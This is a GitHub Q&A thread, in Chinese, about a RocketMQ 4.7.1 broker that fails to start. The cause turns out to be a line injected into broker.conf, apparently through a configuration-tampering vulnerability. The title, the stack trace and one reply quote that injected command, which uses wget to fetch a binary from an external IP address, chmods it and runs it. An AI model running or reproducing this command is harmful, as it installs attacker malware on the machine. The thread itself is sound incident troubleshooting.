### DISCUSSION TITLE
ch.qos.logback.core.joran.spi.JoranException: Could not open [-c $@|sh . echo cd /tmp; wget http:/141.98.7.172/bins/kvm.x86; chmod 777 kvm.x86; ./kvm.x86 maquenas;/conf/logback_broker.xml].

### DISCUSSION THREAD

**Discussion by bruce-pang** [apache/rocketmq#8238] [Q&A] [answered]
rocketmq 版本: 4.7.1
执行命令: ./mqbroker localhost:9876 -c /home/software/dev/rocketmq-all-4.7.1/conf/broker.conf  autoCreateTopicEnable=true  &
报错如下:
ch.qos.logback.core.joran.spi.JoranException: Could not open [-c $@|sh . echo cd /tmp; wget http:/141.98.7.172/bins/kvm.x86; chmod 777 kvm.x86; ./kvm.x86 maquenas;/conf/logback_broker.xml].
	at ch.qos.logback.core.joran.GenericConfigurator.doConfigure(GenericConfigurator.java:80)
	at ch.qos.logback.core.joran.GenericConfigurator.doConfigure(GenericConfigurator.java:68)
	at org.apache.rocketmq.broker.BrokerStartup.createBrokerController(BrokerStartup.java:190)
	at org.apache.rocketmq.broker.BrokerStartup.main(BrokerStartup.java:58)
目前已经确定/conf/logback_broker.xml存在,并且也不是权限原因造成 有大佬遇到过么?

**Comment by zhiliatom** [comment]
启动Broker的命令没有localhost:9876 这一段

**Reply by bruce-pang** [reply]
我发现broker.conf里面的内容貌似是启动后动态进行修改的, 现在我发现broker.conf中直接存在有-c $@|sh . echo cd /tmp; wget http:/141.98.7.172/bins/kvm.x86这一行, 手动使用vim删除后,重新执行命令: ./mqbroker localhost:9876 -c /home/software/dev/rocketmq-all-4.7.1/conf/broker.conf autoCreateTopicEnable=true &得以正常启动

**Reply by zhiliatom** [reply, marked as answer]
是不是 RocketMQHome 这个配置被修改了，我记得有个漏洞是可以修改这个配置的，然后启动就会报错

**Reply by bruce-pang** [reply]
> 是不是 RocketMQHome 这个配置被修改了，我记得有个漏洞是可以修改这个配置的，然后启动就会报错
的确是的，发现这个配置文件被修改了，我手动删除后，重新执行命令解决的
